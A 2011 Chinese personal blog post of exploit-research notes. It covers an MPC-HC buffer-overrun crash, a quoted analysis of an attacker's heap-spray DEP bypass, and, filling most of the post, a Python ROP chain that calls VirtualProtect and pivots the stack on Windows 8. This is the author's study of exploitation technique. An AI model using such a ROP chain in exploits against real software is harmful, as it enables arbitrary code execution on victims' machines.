记事
Posted on | 十一月 2, 2011 | No Comments
http://mpc-hc.svn.sourceforge.net/viewvc/mpc-hc/trunk/src/filters/transform/MPCVideoDec/MPCVideoDecFilter.cpp?view=log
// We crash inside this function
// In swscale.c: Function ‘simpleCopy’
// Line: 1961 – Buffer Overrun
// This might be ffmpeg fault or more likely mpchc is not reinitializing ffmpeg correctly during display change (moving mpchc window from display A to display B)
搞了好久才无意发现是这个。暂时不好利用。待定了。
枉费我在没SYMBOLS的情况下搞了好久,心碎啊,教训教训。。
While this DLL seems interesting, it does not import VirtualAlloc, VirtualProtect, HeapCreate, WriteMemory or even a LoadLibrary, which complicates exploitation. However, the attacker did find and use other functions:
4A84903C CreateFileA // create the file iso88591
4A849038 CreateFileMappingA // attrib RWE
4A849030 MapViewOfFile // load this file in memory with RWE flags
4A849170 memcpy // copy the payload
The idea of the attacker was to spray the heap with a ROP pattern, followed by the shellcode. It first creates a file (iso88591) on disk, loads it with RWE attributes, copies the payload in memory and eventually executes the shellcode.
新思路,BYPASS DEP ASLR .
rop = [
rop_base + 0x1022, # retn
# Write lpfOldProtect
rop_base + 0x2c283, # pop eax; retn
heap - 0x1000, # lpfOldProtect -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write flNewProtect
rop_base + 0x2c283, # pop eax; retn
0×40, # flNewProtect -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write dwSize
rop_base + 0x2c283, # pop eax; retn
0×60000, # dwSize -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write lpAddress
rop_base + 0x2c283, # pop eax; retn
heap & ~0xfff, # lpAddress -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write &Pivot
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x229a5, # &pivot -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write &VirtualProtect
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax
rop_base + 0x12fda, # mov eax,DWORD PTR [eax]
rop_base + 0x1db4f, # mov [esi],eax; retn
# Pivot ESP
rop_base + 0x229a5, # xchg esi,esp; retn;
# Jump into shellcode
rop_base + 0xdace8 # push esp; retn
]
WIN8上的ROP,有点小变化啦。
https://code.google.com/p/address-sanitizer/
貌似最近CHROME用这东东发现不少use-after-free and out-of-bound bugs
标记+1啦~
相关文章:
评论|Comments
留言|Leave a Reply
Archives
- 2012年五月 (1)
- 2012年四月 (1)
- 2012年三月 (3)
- 2012年一月 (1)
- 2011年十二月 (1)
- 2011年十一月 (4)
- 2011年十月 (3)
- 2011年九月 (2)
- 2011年八月 (1)
- 2011年七月 (1)
- 2011年五月 (1)
- 2011年三月 (3)
- 2011年二月 (2)
- 2011年一月 (6)
- 2010年十一月 (2)
- 2010年十月 (10)
- 2010年九月 (7)
- 2010年八月 (4)
- 2010年七月 (11)
- 2010年六月 (14)
- 2010年五月 (14)
- 2010年四月 (20)
- 2010年三月 (61)
- 2010年二月 (71)
- 2010年一月 (59)
- 2009年十二月 (78)
- 2009年十一月 (61)
链接表
SUNSHINE
About
